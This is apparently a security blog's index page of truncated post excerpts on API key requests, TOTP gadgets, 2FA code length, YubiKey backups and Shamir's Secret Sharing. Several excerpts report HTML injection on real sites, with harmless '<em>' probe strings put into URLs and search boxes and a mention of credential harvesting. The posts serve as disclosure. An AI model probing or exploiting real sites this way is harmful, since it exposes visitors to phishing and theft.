My CDN just asked me for all my Twitter API keys... WTF? This would give them complete access to my app's Twitter account, the ability to send and receive messages, and anything else that my API key allows. Giving them - or anyone - the entire set of credentials would be a very bad idea. What's going on? Twitter's slow-motion collapse and hostility to developers is causing a whole bunch of second-order effects. Lots of services let people log in to them using Twitter. It is (was?!) a…
Continue reading →
Behold! Thanks to the power of the Watchy development platform, I now have all my 2FA codes available at the flick of my wrist! HOWTO This uses Luca Dentella's TOTP-Arduino library. You will need a pre-shared secret which is then converted into a Hex array. Use the OTP Tool for Arduino TOTP Library to get the Hex array, Base32 Encoded Key, and a QR Code to scan into your normal TOTP generator. Add the Hex array into the code below. To check that it is functioning correctly, either scan…
Continue reading →
I'm not thick. I know it doesn't sound like much of a boast, but I'm pretty competent at this whole adulting lark. But it appeared that I had forgotten a 4 digit number I'd set up less than a minute ago! The security guard smiled wearily at me, "It happens to everyone!" She said. Which, I'll admit was of small comfort. Work had taken the (sensible) decision that our entry cards weren't secure enough. In order to gain access to the building we needed to present our card and type in a 4 digital …
Continue reading →
Should my bank be able to block me from using their Android app, just because my phone is rooted? I'm reluctantly coming to the conclusion that... yeah, it's fair that they get to decide their own risk tolerance. Sage of the Internet, and general Sooth Sayer, Cory Doctorow once gave an impassioned speech on "The Coming War on General Computation". I'll let you read the whole thing but, I think, the salient point is that some people want to restrict the maths we're allowed to do on our…
Continue reading →
This is a curious book. It starts out as a look at the security of everyday objects, but quickly becomes a series of after-dinner anecdotes about various security related issues. That's not a bad thing, as such, but a little different from what I was expecting. There's no doubt that Mikko walks the walk as well as talking the talk. Almost every page contains a bon mot. For example: Working in information security is sometimes a bit like playing Tetris: your successes disappear but your…
Continue reading →
Codeberg is a hip new code hosting site - similar to GitHub and GitLab. And, much like Gits Hub & Lab, users can serve static content through Codeberg pages. Somehow I screwed up my configuration, and when I visited edent.codeberg.page/abc123 I got this error: Now, whenever I see something from the request echoed into the page's source, my hacker-sense starts tingling. What happens if I shove an innocent HTML element into the URl? edent.codeberg.page/abc<em>123 Aha! It lets through…
Continue reading →
After my blog post about recovering my accounts after a disaster, I followed the most repeated advice: Get two YubiKeys Associate them both with your accounts Keep one off-site in a safe location OK, done! My wife and I spend a very boring evening going through every single account we have which supports FIDO tokens with WebAuthN - about a dozen in total. We manually paired two keys each. We put our main key on our keyrings, then drove out to the woods and buried our spares in a a…
Continue reading →
There's no way that I could find to report this to the Canadian Government - and I didn't fancy trying to raise a bug report with the first Mountie I met - so here's a blog post. As part of Canada's Electronic Travel Authorisation system, prospective visitors to the country get sent emails. The email I received had a broken image right at the top: At least there's some alt text! Gmail on Android doesn't let you view the source of an email, but the web version does. Here's what it says: …
Continue reading →
The other day, a company sent me a 2FA code which was only four digits long. I'll admit, this weirded me out. Surely 4 is just far too short. Right? I think almost every 2FA code I've seen has been 6 digits long. Even back in the days of carrying one of those physical RSA fobs, 6 has been the magic number. But why? A 2FA code is meant to prevent a specific class of problem. If an attacker has got hold of something you are (your username) and something you know (your password), you are…
Continue reading →
Another day, another unfiltered reflection of user-supplied content! You know how this goes by now. You type into a search box <em>test and the whole page suddenly turns italic. Luckily, the Macmillan Publishers' website filtered out any <script> elements it encountered. But that still leaves the attacker with the ability to draw SVGs over the page or, more maliciously, start harvesting usernames, passwords, and credit card details from unwary visitors. Here's a quick example of what an…
Continue reading →
I hate academic tests. Wouldn't it be great if you could find the official answer papers? Oh, cool, the OCR Exam Board is hosting answer sheets for all my classes! What happens if I click it? Yeach! It redirects users to a scammy ebook service hosted on an external website. Which, I assume, the exam board does not endorse. Alongside exam books, textbooks, literary classics - there's a bunch of material which probably isn't suitable for school… If you visit the root of the domain, it s…
Continue reading →
Shamir's Secret Sharing (henceforth "SSS") is clever. Far too clever for most people to understand - but let's give it a go. Suppose you have a super-secure password for a Really Important Thing. Th15IsMyP4s5w0rd!123 You can remember this - because you're awesome. But it might be a good idea to share the password with someone else, just in case. Of course, if you share it with one person, they'll be able to use it. No good! So you split the password into several overlapping pieces and give…
Continue reading →
